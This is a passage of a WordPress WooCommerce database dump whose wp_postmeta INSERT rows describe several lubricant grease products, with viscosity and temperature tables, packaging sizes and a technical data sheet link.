oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4570, 643, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4571, 643, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4572, 643, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4573, 643, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4574, 643, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4575, 643, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4576, 643, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4577, 643, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4578, 643, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4579, 643, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4580, 643, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4581, 643, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4582, 643, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4583, 643, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4584, 643, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4585, 643, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4586, 643, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4587, 643, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4588, 643, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4589, 643, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4590, 643, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4591, 643, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4592, 643, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4593, 643, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4594, 643, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4595, 643, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4596, 643, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4597, 643, '318_custom_list_file', 'a:1:{s:32:"7fe2e32ab19d9b3df8ef39d068d1e492";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4627, 643, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4628, 643, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4629, 644, '_edit_lock', '1503076766:2'); 
INSERT INTO `wp_postmeta` VALUES (4630, 644, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4631, 644, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4632, 644, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4633, 644, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">240AZ</td>\r\n<td style="text-align: center;" width="241">240AA</td>\r\n<td style="text-align: center;" width="213">240AB</td>\r\n<td style="text-align: center;" width="167">240AC</td>\r\n<td style="text-align: center;" width="167">240AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1540</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td style="text-align: center;">(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4634, 644, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4635, 644, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4636, 644, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4637, 644, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4638, 644, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4639, 644, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4640, 644, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4641, 644, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4642, 644, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4643, 644, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4644, 644, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4645, 644, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4646, 644, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4647, 644, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4648, 644, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4649, 644, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4650, 644, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4651, 644, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4652, 644, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4653, 644, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4654, 644, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4655, 644, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4656, 644, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4657, 644, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4658, 644, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4659, 644, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4660, 644, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4661, 644, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4662, 644, '318_custom_list_file', 'a:1:{s:32:"7fe2e32ab19d9b3df8ef39d068d1e492";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4692, 644, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4693, 644, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4694, 645, '_edit_lock', '1503084029:2'); 
INSERT INTO `wp_postmeta` VALUES (4695, 645, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4696, 645, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4697, 645, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4698, 645, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">240AZ</td>\r\n<td style="text-align: center;" width="241">240AA</td>\r\n<td style="text-align: center;" width="213">240AB</td>\r\n<td style="text-align: center;" width="167">240AC</td>\r\n<td style="text-align: center;" width="167">240AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1540</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td style="text-align: center;">(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4699, 645, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4700, 645, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4701, 645, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4702, 645, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4703, 645, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4704, 645, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4705, 645, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4706, 645, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4707, 645, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4708, 645, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4709, 645, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4710, 645, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4711, 645, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4712, 645, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4713, 645, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4714, 645, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4715, 645, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4716, 645, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4717, 645, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4718, 645, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4719, 645, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4720, 645, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4721, 645, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4722, 645, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4723, 645, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4724, 645, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4725, 645, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4726, 645, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4727, 645, '318_custom_list_file', 'a:1:{s:32:"7fe2e32ab19d9b3df8ef39d068d1e492";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4757, 645, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4758, 645, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4759, 646, '_edit_lock', '1475603701:2'); 
INSERT INTO `wp_postmeta` VALUES (4760, 646, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4761, 646, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4762, 646, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4763, 646, '312_default_editor', '<table width="880">\r\n<tbody>\r\n<tr>\r\n<td width="202">Extreme Pressure Grade</td>\r\n<td style="text-align: center;" width="224">250AZ</td>\r\n<td style="text-align: center;" width="241">250AC</td>\r\n<td style="text-align: center;" width="213">250AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1540</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td style="text-align: center;">(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4764, 646, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4765, 646, '318_custom_list_file', 'a:1:{s:32:"47de1b05166e3c7c549fe10942a90cff";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (4766, 646, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4767, 646, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4768, 646, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4769, 646, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4770, 646, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4771, 646, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4772, 646, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4773, 646, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4774, 646, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4775, 646, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4776, 646, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4777, 646, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4778, 646, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4779, 646, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4780, 646, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4781, 646, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4782, 646, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4783, 646, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4784, 646, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4785, 646, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4786, 646, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4787, 646, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4788, 646, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4789, 646, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (4790, 646, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4791, 646, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4792, 646, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4793, 646, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4794, 646, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4795, 647, '_edit_lock', '1503319065:2'); 
INSERT INTO `wp_postmeta` VALUES (4796, 647, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4797, 647, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4798, 647, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4799, 647, '312_default_editor', '<table width="880">\r\n<tbody>\r\n<tr>\r\n<td width="202">Extreme Pressure Grade</td>\r\n<td style="text-align: center;" width="224">250AZ</td>\r\n<td style="text-align: center;" width="241">250AC</td>\r\n<td style="text-align: center;" width="213">250AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1540</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td style="text-align: center;">(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4800, 647, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4801, 647, '318_custom_list_file', 'a:1:{s:32:"7fe2e32ab19d9b3df8ef39d068d1e492";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (4802, 647, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4803, 647, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4804, 647, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4805, 647, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4806, 647, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4807, 647, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4808, 647, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4809, 647, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4810, 647, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4811, 647, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4812, 647, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4813, 647, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4814, 647, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4815, 647, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4816, 647, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4817, 647, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4818, 647, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4819, 647, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4820, 647, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4821, 647, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4822, 647, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4823, 647, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4824, 647, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4825, 647, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4826, 647, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4827, 647, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4828, 647, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4858, 647, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4859, 647, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4860, 648, '_edit_lock', '1503344190:2'); 
INSERT INTO `wp_postmeta` VALUES (4861, 648, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4862, 648, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4863, 648, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4864, 648, '312_default_editor', '<table width="880">\r\n<tbody>\r\n<tr>\r\n<td width="202">Extreme Pressure Grade</td>\r\n<td style="text-align: center;" width="224">250AZ</td>\r\n<td style="text-align: center;" width="241">250AC</td>\r\n<td style="text-align: center;" width="213">250AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1540</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td style="text-align: center;">(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
